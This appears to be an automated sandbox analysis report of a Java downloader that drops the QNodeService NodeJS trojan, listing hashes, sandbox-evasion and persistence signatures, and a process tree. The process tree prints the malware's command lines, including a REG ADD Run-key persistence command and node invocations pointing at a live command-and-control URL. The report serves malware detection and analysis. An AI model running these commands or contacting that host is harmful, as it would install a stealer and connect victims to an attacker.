Analysis
Max time kernel: 130s
Max time network: 148s
Platform: windows10_x64
Resource: win10v200430
Submitted: 06/07/2020, 14:46
Static task: static1
Behavioral task: behavioral1
  Sample: 99dcdadfeed1b6271637cd158eddc785.jar
  Resource: win7
Behavioral task: behavioral2
  Sample: 99dcdadfeed1b6271637cd158eddc785.jar
  Resource: win10v200430
General
Target: 99dcdadfeed1b6271637cd158eddc785.jar
Size: 11KB
MD5: 99dcdadfeed1b6271637cd158eddc785
SHA1: 4420bd2bb41db133243192337ff37a1b9a34414a
SHA256: f0e9d3a5162ecadf7a48a64603e0d813ed45ff53882e63251e3f3c7c5a2e408b
SHA512: 4ca54d207a9ee57d14edd00d195bd2264443e2242fc6dce31eac2a2f0a33ce3d88e208819ef53aac874df6d52edbd041dde532f4a6266379ca7d7ea275f0126f
Malware Config
Signatures
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  3612  node.exe
  3612  node.exe
Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                      Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  node.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                      node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz                 node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString  node.exe
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  11    wtfismyip.com
  12    wtfismyip.com
Suspicious use of WriteProcessMemory (8 IoCs)
  description                       pid   Process   procid_target
  PID 1620 wrote to memory of 4084  1620  java.exe  73
  PID 1620 wrote to memory of 4084  1620  java.exe  73
  PID 4084 wrote to memory of 2712  4084  node.exe  74
  PID 4084 wrote to memory of 2712  4084  node.exe  74
  PID 2712 wrote to memory of 2828  2712  cmd.exe   75
  PID 2712 wrote to memory of 2828  2712  cmd.exe   75
  PID 4084 wrote to memory of 3612  4084  node.exe  76
  PID 4084 wrote to memory of 3612  4084  node.exe  76
Executes dropped EXE (2 IoCs)
  pid   Process
  4084  node.exe
  3612  node.exe
Loads dropped DLL (4 IoCs)
  pid   Process
  3612  node.exe
  3612  node.exe
  3612  node.exe
  3612  node.exe
QNodeService NodeJS Trojan (1 IoC)
  resource                                        yara_rule
  behavioral2/files/0x000100000001bfa0-118.dat    family_qnodeservice
Adds Run entry to start application (2 TTPs, 2 IoCs)
  description      ioc                                                                                                   Process
  Key created      \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run    reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-a553500b = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-a553500b.cmd\""    reg.exe
QNodeService is a trojan written in NodeJS and spread via a Java downloader. It includes stealer functionality.
Processes
C:\ProgramData\Oracle\Java\javapath\java.exe
  Command line: java -jar C:\Users\Admin\AppData\Local\Temp\99dcdadfeed1b6271637cd158eddc785.jar
  PID: 1620
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
    Command line: C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://richiealvin2020.casacam.net
    PID: 4084
    - Suspicious use of WriteProcessMemory
    - Executes dropped EXE
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-a553500b" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-a553500b.cmd\"""
      PID: 2712
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\reg.exe
        Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-a553500b" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-a553500b.cmd\""
        PID: 2828
        - Adds Run entry to start application
    C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
      Command line: C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://richiealvin2020.casacam.net
      PID: 3612
      - Suspicious behavior: EnumeratesProcesses
      - Checks processor information in registry
      - Executes dropped EXE
      - Loads dropped DLL